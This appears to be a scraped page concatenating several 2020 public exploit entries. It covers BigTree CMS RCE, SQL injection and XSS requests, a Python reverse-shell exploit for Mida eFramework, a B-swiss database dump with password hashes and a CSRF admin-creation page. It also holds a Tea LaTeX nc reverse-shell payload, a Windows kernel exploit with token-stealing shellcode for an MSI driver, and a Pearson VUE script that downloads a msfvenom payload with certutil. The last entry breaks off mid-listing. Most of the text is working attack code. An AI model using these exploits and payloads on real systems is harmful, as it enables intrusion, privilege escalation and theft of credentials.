HireHackking

# Exploit Title: BigTree CMS 4.4.10 - Remote Code Execution # Google Dork: " BigTree CMS " # Date: 2020-25-09 # Exploit Author: SunCSR (ThienNV and HoaVT - Sun* Cyber Security Research) # Vendor Homepage: https://www.bigtreecms.org/ # Software Link: https://www.bigtreecms.org/ # Version: 4.4.10 # Tested on: Windows # CVE : N/A ## 1. Authenticated Remote Code Execution # Attack type: Remote # Impact: Remote arbitrary code execution # Affected component(s): /core/admin/field-types/list/draw.php # Attack vectors: Authenticated user (developer) can inject malicious command to the applications via crete new setting function: # Description: BigTree 4.4.10 and earlier are vulnerable to Authenticated Remote Code Execution vulnerability. An authenticated user (developer) can send a crafted request to the server and perform remote command execution (RCE). # Severity (CVSS 3.1): Base Score: 9.1 CRITICAL # POC: Developer create setting and code will be executed when load settings: POST /BigTreeCMS/site/index.php/admin/developer/settings/create/ HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 388 Origin: http://xxxx Connection: close Referer: http://xxxx/BigTreeCMS/site/index.php/admin/developer/settings/add/ Cookie: PHPSESSID=ipmr6c2jplqqlgcdrkgbtg4tfl; bigtree_admin[email]=tadmin%40bigtree.com; bigtree_admin[login]=%5B%22session-5f6d51f54fc301.14043773%22%2C%22chain-5f6d51f54fb248.84144127%22%5D Upgrade-Insecure-Requests: 1 __csrf_token_PEFN3BUK0DAXK7Y10NJWT5E4813WXTXB__=tx6rzTz4ddDFI60tfcBe8tDN7lJ2YA3WlcdPLm/EbeY=&id=Test rce&name=Test rce&type=list&settings={"list_type":"static","allow-empty":"Yes","list":"whoami","pop-table":"","parser":"system"}&description=<p>Test rce</p> # Video: https://vimeo.com/461667065 ## 2. Authenticated SQL Injection # Attack type: Remote #Impact: Authenticated SQl Injection in BigTree CMS # Attack vectors: Authenticated user (developer) can inject malicious SQL query to the applications via crete new feed function: # Affected component(s): /core/feeds/custom.php # Description:BigTree 4.4.10 and earlier are vulnerable to Authenticated SQL Injection vulnerability. An authenticated user (developer) can send a malicious sql query to the server and perform sql query. # Severity (CVSS 3.1): Base Score: 7.2 HIGH # POC: Request create or edit feed: POST /site/index.php/admin/developer/feeds/create/ HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 379 Origin: http://xxxx Connection: close Referer: http://xxxx/site/index.php/admin/developer/feeds/add/ Cookie: yyyy __csrf_token_RW2U3KT3JXVY70AKWPV9UHG3HWQ12PP4__=S0%2B7MADREPOzg1%2Fkht7xbgzv0uKqrRpuccn2gOmft88%3D&name=SQL+Injection&table=sqli_test+union+select+sleep(5)%23&type=custom&settings=%7B%22sort%22%3A%22%60id%60+ASC%22%2C%22limit%22%3A%222%22%2C%22parser%22%3A%22system%2Cexec%22%7D&description=as&fields%5Bid%5D%5Bwidth%5D=&fields%5Bid%5D%5Btitle%5D=ID&fields%5Bid%5D%5Bparser%5D=12 # Video: https://vimeo.com/461667107 ## 3. Authenticated Stored Cross-Site Scripting # Attack type: Remote # Impact: Stored XSS # Affected component(s): site/index.php/admin/pages/update # Attack vector(s): Authenticated user (developer) can inject malicious Javascript to the applications via crete or update page function: # Description: Stored XSS vulnerabilities in the BigTree 4.4.10 and earlier allow remote authenticated user with low privilege (editor or publisher) to inject arbitrary web script or HTML via the page content to site/index.php/admin/pages/update # Severity (CVSS 3): Base Score: 6.5 MEDIUM # POC: Request create or edit page: POST /BigTreeCMS/site/index.php/admin/pages/update/ HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------2320192840320212926996245368 Content-Length: 12173 Origin: http://xxx Connection: close Referer: http://xxxx/BigTreeCMS/site/index.php/admin/pages/edit/2/ Cookie: yyyy ---some fields here--- <p>&nbsp;<span class="s1"><em>These people are ridiculous and fake. This page is an example of a </em><a href="https://www.bigtreecms.org/docs/dev-guide/templates/" target="_blank" rel="noopener"><span class="s2"><em>basic template</em></span></a><em> with page content and a set of </em><a href="https://www.bigtreecms.org/docs/dev-guide/callouts/" target="_blank" rel="noopener"><span class="s2"><em>callouts</em></span></a><em>. Go to the </em><a href="https://www.bigtreecms.org/docs/dev-guide/installation/" target="_blank" rel="noopener"><span class="s2"><em>BigTree Developer Guide</em></span></a><em> for more.</em></span></p> <p><span class="s1"><em>XSS here <script>alert(origin)</script></em></span></p> -----------------------------2320192840320212926996245368 ---some fields here--- # Video: https://vimeo.com/461667129

# Exploit Title: Mida eFramework 2.8.9 - Remote Code Execution # Google Dork: Server: Mida eFramework # Date: 2020-08-27 # Exploit Author: elbae # Vendor Homepage: https://www.midasolutions.com/ # Software Link: http://ova-efw.midasolutions.com/ # Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html # Version: <= 2.8.9 # CVE : CVE-2020-15922 #! /usr/bin/python3 # -*- coding: utf-8 -*- import argparse import base64 import random import requests import subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def print_disclaimer(): print(""" --------------------- Disclaimer: 1) For testing purpose only. 2) Do not attack production environments. 3) Intended for educational purposes only and cannot be used for law violation or personal gain. 4) The author is not responsible for any possible harm caused by this material. ---------------------""") def print_info(): print(""" [*] PoC exploit for Mida eFramework 2.8.9 PDC (CVE-2020-15922) [*] Reference:https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html [*] Vulnerability: OS Command Injection RCE in PDC/pages/network.php - Reverse Shell ./CVE-2020-15922 http://192.168.1.60:8090/PDC/pages/network.php rev-IP rev-PORT """) def run_cmd(url,ip,port): rev_shell = "sudo bash -i >& /dev/tcp/{0}/{1} 0>&1".format(ip,port) print("[+] Reverse shell: {0}".format(rev_shell)) data = { "submit":"True", "ipaddress0":"; {0}".format(rev_shell), "netmask0":"", "gateway0":"", "dns1":"", "dns2":"" } # exec rev shell print("[*] Starting reverse shell to {0} {1}...".format(ip,port)) try: r = requests.post(url,data=data,verify=False,timeout=1) except requests.exceptions.ReadTimeout: print("[?] ...check if it worked") pass def main(): print_info() print_disclaimer() parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="the complete target URL") parser.add_argument("ip", type=str, help="the ip address for reverse shell") parser.add_argument("port", type=str, help="the port for reverse shell") args = parser.parse_args() run_cmd(args.target, args.ip, args.port) if __name__ == '__main__': main()

# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure # Date: 2020-09-16 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.b-swiss.com # Version: 3.6.5 # Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00 B-swiss 3 Digital Signage System 3.6.5 Database Disclosure Vendor: B-Swiss SARL | b-tween Sarl Product web page: https://www.b-swiss.com Affected version: 3.6.5 3.6.2 3.6.1 3.6.0 3.5.80 3.5.40 3.5.20 3.5.00 3.2.00 3.1.00 Summary: Intelligent digital signage made easy. To go beyond the possibilities offered, b-swiss allows you to create the communication solution for your specific needs and your graphic charter. You benefit from our experience and know-how in the realization of your digital signage project. Desc: The application is vulnerable to unauthenticated database download and information disclosure vulnerability. This can enable the attacker to disclose sensitive information resulting in authentication bypass, session hijacking and full system control. Tested on: Linux 5.3.0-46-generic x86_64 Linux 4.15.0-20-generic x86_64 Linux 4.9.78-xxxx-std-ipv6-64 Linux 4.7.0-040700-generic x86_64 Linux 4.2.0-27-generic x86_64 Linux 3.19.0-47-generic x86_64 Linux 2.6.32-5-amd64 x86_64 Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 macOS 10.13.5 Microsoft Windows 7 Business Edition SP1 i586 Apache/2.4.29 (Ubuntu) Apache/2.4.18 (Ubuntu) Apache/2.4.7 (Ubuntu) Apache/2.2.22 (Win64) Apache/2.4.18 (Ubuntu) Apache/2.2.16 (Debian) PHP/7.2.24-0ubuntu0.18.04.6 PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 PHP/5.6.31 PHP/5.6.30-10+deb.sury.org~xenial+2 PHP/5.5.9-1ubuntu4.17 PHP/5.5.9-1ubuntu4.14 PHP/5.3.10 PHP/5.3.13 PHP/5.3.3-7+squeeze16 PHP/5.3.3-7+squeeze17 MySQL/5.5.49 MySQL/5.5.47 MySQL/5.5.40 MySQL/5.5.30 MySQL/5.1.66 MySQL/5.1.49 MySQL/5.0.77 MySQL/5.0.12-dev MySQL/5.0.11-dev MySQL/5.0.8-dev phpMyAdmin/3.5.7 phpMyAdmin/3.4.10.1deb1 phpMyAdmin/3.4.7 phpMyAdmin/3.3.7deb7 WampServer 3.2.0 Acore Framework 2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5588 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php 13.06.2020 -- $ curl -s http://192.168.10.11/bswiss3.sql |grep admin_m -B1 -A4 INSERT INTO `users` (`id`, `created_by`, `created_by_adminlevelid`, `firstname`, `lastname`, `email`, `username`, `password`, `adminlevel`, `status`, `language`, `creationdate`, `receives_validation_alerts`, `can_change_password`) VALUES (1, 0, 0, 'Dusko', 'Dolgousko', 'duki@looney.tunes', 'admin_m', '999f311dd5bd2b83ea849229a8906b29', 100000, 1, 'french-sw', '0000-00-00 00:00:00', 1, 0), (3, 2, 7, 'b-swiss', ' ', ' ', 'b-swiss', '999f311dd5bd2b83ea849229a8906b29', 7, 1, 'french-sw', '2020-06-27 16:28:30', 0, 1), (13, 3, 7, 'Admin', ' ', ' ', 'admin', '21232f297a57a5a743894a0e4a801fc3', 24, 1, 'french-sw', '2020-07-26 17:48:16', 0, 1), (14, 13, 24, 'User', ' ', ' ', 'User', 'ee11cbb19052e40b07aac0ca060c23ee', 26, 1, 'french-sw', '2020-07-27 14:26:35', 0, 1), (18, 13, 24, 'Test', ' ', ' ', 'test', '81dc9bdb52d04dc20036dbd8313ed055', 29, 1, 'french-sw', '2020-07-27 14:30:07', 0, 1);

# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin) # Date: 2020-09-16 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.b-swiss.com # Version: 3.6.5 Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00 <!-- B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin Vendor: B-Swiss SARL | b-tween Sarl Product web page: https://www.b-swiss.com Affected version: 3.6.5 3.6.2 3.6.1 3.6.0 3.5.80 3.5.40 3.5.20 3.5.00 3.2.00 3.1.00 Summary: Intelligent digital signage made easy. To go beyond the possibilities offered, b-swiss allows you to create the communication solution for your specific needs and your graphic charter. You benefit from our experience and know-how in the realization of your digital signage project. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Linux 5.3.0-46-generic x86_64 Linux 4.15.0-20-generic x86_64 Linux 4.9.78-xxxx-std-ipv6-64 Linux 4.7.0-040700-generic x86_64 Linux 4.2.0-27-generic x86_64 Linux 3.19.0-47-generic x86_64 Linux 2.6.32-5-amd64 x86_64 Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 macOS 10.13.5 Microsoft Windows 7 Business Edition SP1 i586 Apache/2.4.29 (Ubuntu) Apache/2.4.18 (Ubuntu) Apache/2.4.7 (Ubuntu) Apache/2.2.22 (Win64) Apache/2.4.18 (Ubuntu) Apache/2.2.16 (Debian) PHP/7.2.24-0ubuntu0.18.04.6 PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 PHP/5.6.31 PHP/5.6.30-10+deb.sury.org~xenial+2 PHP/5.5.9-1ubuntu4.17 PHP/5.5.9-1ubuntu4.14 PHP/5.3.10 PHP/5.3.13 PHP/5.3.3-7+squeeze16 PHP/5.3.3-7+squeeze17 MySQL/5.5.49 MySQL/5.5.47 MySQL/5.5.40 MySQL/5.5.30 MySQL/5.1.66 MySQL/5.1.49 MySQL/5.0.77 MySQL/5.0.12-dev MySQL/5.0.11-dev MySQL/5.0.8-dev phpMyAdmin/3.5.7 phpMyAdmin/3.4.10.1deb1 phpMyAdmin/3.4.7 phpMyAdmin/3.3.7deb7 WampServer 3.2.0 Acore Framework 2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5589 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php 13.06.2020 --> <html> <body> <h1>CSRF Add b-swiss Maintenance Admin</h1> <script> function GodMode() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed"); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"locator\"\r\n" + "\r\n" + "Users.Save\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"page\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"sort\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"id\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"ischildgrid\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"inpopup\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"ongridpage\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rowid\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"preview_screenid\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_firstname\"\r\n" + "\r\n" + "TestingusF\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_lastname\"\r\n" + "\r\n" + "TestingusL\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_email\"\r\n" + "\r\n" + "aa@bb.cc\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_username\"\r\n" + "\r\n" + "testingus\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_password\"\r\n" + "\r\n" + "123456\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" + "\r\n" + "123456\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" + "\r\n" + "100000\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_status\"\r\n" + "\r\n" + "1\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_language\"\r\n" + "\r\n" + "french-sw\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" + "\r\n" + "2\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" + "\r\n" + "1\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Press me" onclick="GodMode();" /> </form> </body> </html>

# Exploit Title: Tea LaTex 1.0 - Remote Code Execution (Unauthenticated) # Google Dork: N/A # Date: 2020-09-01 # Exploit Author: nepska # Vendor Homepage: https://github.com/ammarfaizi2/latex.teainside.org # Software Link: https://github.com/ammarfaizi2/latex.teainside.org # Version: v1.0 # Tested on: Kali linux / Windows 10 # CVE: N/A # Header Requests POST /api.php?action=tex2png HTTP/1.1 Host: latex.teainside.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: text/plain;charset=UTF-8 Content-Length: 64 Origin: https://latex.teainside.org DNT: 1 Connection: keep-alive Referer: https://latex.teainside.org/ Cookie: __cfduid=d7e499dd5e2cf708117e613f7286aa2021599260403 {"content":"\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}","d":200,"border":"50x20","bcolor":"white"} # Payload \documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document} # Attacker nc -lvp 1234

/* Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation Date: 2020-09-24 Exploit Author: Matteo Malvica Vendor Homepage: https://www.msi.com Software Link: https://msi.gm/ABLTMNB Driver: MSIO64.sys SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD Version: 1.0.0.8 Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406] MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation CVE: CVE-2020-17382 Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/ Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities */ #include <iostream> #include <string> #include <Windows.h> #include <Psapi.h> #pragma warning( disable : 6387 ) VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) { // SHELLCODE FOR 1709 BYTE token_steal[] = "\x65\x48\x8B\x14\x25\x88\x01\x00\x00" // mov rdx, [gs:188h] ; Get _ETHREAD pointer from KPCR "\x4C\x8B\x82\xB8\x00\x00\x00" // mov r8, [rdx + b8h] ; _EPROCESS (kd> u PsGetCurrentProcess) "\x4D\x8B\x88\xe8\x02\x00\x00" // mov r9, [r8 + 2e8h] ; ActiveProcessLinks list head "\x49\x8B\x09" // mov rcx, [r9] ; Follow link to first process in list //find_system_proc: "\x48\x8B\x51\xF8" // mov rdx, [rcx - 8] ; Offset from ActiveProcessLinks to UniqueProcessId "\x48\x83\xFA\x04" // cmp rdx, 4 ; Process with ID 4 is System process "\x74\x05" // jz found_system ; Found SYSTEM token "\x48\x8B\x09" // mov rcx, [rcx] ; Follow _LIST_ENTRY Flink pointer "\xEB\xF1" // jmp find_system_proc ; Loop //found_system: "\x48\x8B\x41\x70" // mov rax, [rcx + 70h] ; Offset from ActiveProcessLinks to Token "\x24\xF0" // and al, 0f0h ; Clear low 4 bits of _EX_FAST_REF structure //find cmd "\x48\x8B\x51\xF8" // mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId "\x48\x81\xFA\x99\x99\x00\x00" // cmp rdx, 0d54h ;UniqueProcessId == ZZZZ? (PLACEHOLDER) "\x74\x05" // jz found_cmd ;YES - move on "\x48\x8B\x09" // mov rcx, [rcx] ;NO - next entry in list "\xEB\xEE" // jmp find_cmd ;loop // found cmd "\x48\x89\x41\x70" // mov [rcx+70h], rax ;copy SYSTEM token over top of this process's token "\x48\x31\xc9" // xor rcx rcx ; clear some registers to avoid issues while unwinding the call stack "\x48\x31\xc0" // xor rax rax "\x48\x31\xf6" // xor rsi,rsi "\x48\x31\xff" // xor rdi, rdi "\x4D\x31\xC0" // xor r8, r8 "\x48\xc7\xc1\xf8\x06\x15\x00" // mov rcx, 0x1506f8 ; move original cr4 value into rcx "\xc3"; // ret ; RET token_steal[54] = pid; token_steal[55] = pid >> 8; LPVOID allocated_shellcode = VirtualAlloc(NULL, sizeof(token_steal), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(allocated_shellcode, token_steal, sizeof(token_steal)); INT64 pop_rcx_offset = kernel_base + 0x15fc70; // gadget 1 1709 - pop rcx ; ret INT64 mov_cr4_offset = kernel_base + 0x76a02; // gadget 2 1709 - mov cr4, ecx ; ret INT64 wbindv_offset = kernel_base + 0x1175c0;; // gadget 3 1709 - wbinvd; ret INT64 rcx_value = 0x506f8; // value we want placed in cr4 in order to disable SMEP INT64 rcx_old_value = 0x1506f8; // original cr4 value INT64 ret = pop_rcx_offset + 1; // RET NOP puts("[+] SMEP disabled"); BYTE input_buff[136] = { 0 }; memset(input_buff, '\x41', 64); memset(input_buff, '\x42', 8); // dummy RBP memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8); // pop rcx memcpy(input_buff + 80, (PINT64)&rcx_value, 8); // disable SMEP value memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8); // wbinvd; ret memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx memcpy(input_buff + 120, (PINT64)&ret, 8); // RETNOP to restore the stack memcpy(input_buff + 128, (PINT64)&ret, 8); // RETNOP to restore the stack printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode); DWORD lpBytesReturned = 0x0; BOOL triggerIOCTL = DeviceIoControl(hFile, IoControlCode, input_buff, sizeof(input_buff), NULL, 0, &lpBytesReturned, NULL); if (!triggerIOCTL) { printf("[!] DeviceIoControl failed: %d\n", GetLastError()); } else { puts("[+] SMEP re-enabled"); puts("[+] Enjoy your SYSTEM shell\n"); } system("start cmd.exe"); } LPVOID GetBaseAddr(const char* drvname) { LPVOID drivers[1024]; DWORD cbNeeded; int nDrivers, i = 0; if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) { char szDrivers[1024]; nDrivers = cbNeeded / sizeof(drivers[0]); for (i = 0; i < nDrivers; i++) { if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) { if (strcmp(szDrivers, drvname) == 0) { return drivers[i]; } } } } return 0; } HANDLE GetDriverHandle() { HANDLE hMsio; hMsio = CreateFileA("\\\\.\\MsIo", FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL); if (hMsio == INVALID_HANDLE_VALUE) { printf("[-] Error obtaining an handle to the driver: %d\n", GetLastError()); exit(1); } return hMsio; } int main() { puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica"); DWORD IoControlCode = 0x80102040; HANDLE hDevice = GetDriverHandle(); INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe"); DWORD pid = GetCurrentProcessId(); eopMsio(hDevice, nt, pid, IoControlCode); return 0; }

# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path # Discovery by: Jok3r # Discovery Date: 2020-09-14 # Vendor Homepage: https://home.pearsonvue.com/ # Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm # Tested Version: 2.3.1911 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es #Description: The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center’s server. VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on "\Pearson VUE\" directory that allows to overwrite by everyone so that unauthorized local user can leverage privileges to VUEService user that has administrative rights. # Detection of unquoted service path: C:\Users\VUEService>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" | findstr /i /v """ VUE Application Wrapper VUEApplicationWrapper C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe Auto C:\Users\VUEService>sc qc VUEApplicationWrapper [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VUEApplicationWrapper TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VUE Application Wrapper DEPENDENCIES : lanmanworkstation SERVICE_START_NAME : .\VUEService #Detection of insecure file permissions: PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\" Directory: C:\ Path Owner Access ---- ----- ------ Pearson Vue BUILTIN\Administrators Everyone Allow FullControl... #Exploit code: @ECHO OFF ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """" wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """ sc qc VUEApplicationWrapper powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'" ECHO [+] Enumeration was completed successfully. ::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell. ::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > VUE.exe ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted. certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\Pearson VUE\VUE.exe" ECHO [*] Downloading VUE executable... PAUSE IF EXIST "C:\Pearson VUE\VUE.exe" ( ECHO [+] The download was successful. ) ELSE ( ECHO [-] The download was unsuccessful. PAUSE ) ECHO [!] If you continue, system will be rebooted. PAUSE shutdown /r /t 0 ::code end

# Exploit Title: Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path # Date: 2020-08-31 # Exploit Author: Angelo D'Amato # Vendor Homepage: https://www.rapid7.com # Version: <=6.6.39 # CVE :N/A Rapid7 Nexpose Installer 6.6.39 Local Privilege Escalation Vendor: Rapid7 Product web page: https://www.rapid7.com Affected version: <=6.6.39 Summary: Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. It integrates with Rapid7's Metasploit for vulnerability exploitation. Desc: Rapid7 Nexpose installer version prior to 6.6.40 uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path, allowing local privilege escalation. Tested on: Microsoft Windows 10 Enterprise, x64-based PC Microsoft Windows Server 2016 Standard, x64-based PC Vulnerability discovered by Angelo D'Amato @zeroscience Advisory ID: ZSL-2019-5587 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5587.php 07.08.2020 -- C:\Users\test>sc qc nexposeengine [SC] QueryServiceConfig SUCCESS SERVICE_NAME: nexposeengine TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\rapid7\nexpose\nse\bin\nxengine.exe 